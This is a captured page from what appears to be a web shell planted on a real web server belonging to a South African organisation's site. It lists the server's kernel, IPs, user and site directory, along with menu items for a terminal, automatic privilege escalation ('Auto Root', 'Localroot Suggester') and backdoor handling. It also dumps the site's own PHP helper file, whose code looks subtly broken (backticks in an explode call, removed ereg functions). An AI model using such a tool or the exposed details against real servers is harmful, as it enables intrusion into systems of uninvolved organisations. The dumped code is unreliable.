Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
echasl23 /
annualdec /
inc /
Delete
Unzip
Name
Size
Permission
Date
Action
auth.inc
734
B
-rw-r--r--
2010-05-27 04:41
conf.inc
2.59
KB
-rw-r--r--
2018-08-01 08:50
database.inc
351
B
-rw-r--r--
2012-02-13 09:24
db.inc
324
B
-rw-r--r--
2020-01-09 09:27
declaration.inc
10.96
KB
-rw-r--r--
2019-02-20 11:15
footer.inc
743
B
-rw-r--r--
2025-03-05 12:29
footer2.inc
157
B
-rw-r--r--
2010-05-27 04:41
func.inc
2.72
KB
-rw-r--r--
2010-05-27 04:41
log_query.php
154
B
-rw-r--r--
2010-05-28 11:22
menu.inc
631
B
-rw-r--r--
2020-01-08 10:37
smenu.inc
627
B
-rw-r--r--
2020-01-08 10:37
Save
Rename
<?php // System Wide Functions // This file should contain all re-useable Functions // Page or Task specific functions should be included only on pages needed. // PLEASE NOTE, no authentication functions should be included here. function systemerror($errortype,$problem,$pageoccurred,$resolution) { $title = "members.saace.co.za - $errortype error"; ?> <html><head><title><?php echo $errortype ?></title> <link rel="stylesheet" href="/inc/default.css" type="text/css"> </head> <body> <!-- Start Page Content Here --> <table width="700" cellpadding="10" border="0" cellspacing="0"><tr><td valign="top"> <div class="outline"> <h3><?php echo $errortype ?></h3> <p> An error has occured</b>: </p> <p> "<?php echo $problem ?>" </p> <p> <?php echo $resolution ?> </p> <p> If you are still having trouble and you are sure this is a valid problem please email <a href="mailto:memberservices@saace.co.za">memberservices@saace.co.za</a> with a full description of what you were trying to do and be sure to copy the information on this page. </p> </div> </td></tr></table> <!-- End Page Content Here --> </body> </html> <?php die(); } function zadate() { $zadate = gmdate ("d F Y", time()+7200); return $zadate; } /******************************************************** *To check if a certain field has been filled out. * *usage: checkIt(variable, question number) * ********************************************************/ function checkIt($what,$question) { if ($what == '' || strlen($what) < 1) { return false; } else { return true; } //end if else } //end function /*********************************************** *Function to see if a email address can exist * *usage: $bool = checkEmail($email_address) * ***********************************************/ function checkEmail($email) { if (eregi("(@.*@)|(\.\.)|(@\.)|(\.@)|(^\.)", $email) || !eregi ("^.+\@(\[?)[-a-zA-Z0-9\.]+\.([a-zA-Z]{2,3}|[0-9]{1,3})(\]?)$", $email)) { return false; } else { list($user, $domain) = explode(`@`, $email); if ((!eregi("^[a-zA-Z0-9\.\-]+$", $user)) || (!eregi("^[a-zA-Z0-9\.\-]+$", $domain))) { return false; } else { return true; } //end if else } //end if else } //end function /**************************************** *Function checks to see if there * *are any numbers in a string. * *If there are, return true, else * *return false. * *Usage: if(checkForNumbers(string)) * ****************************************/ function checkForNumbers($string) { if (ereg("[0-9]",$string) == 0) { return false; } else { return true; } //end if else } //end function ?>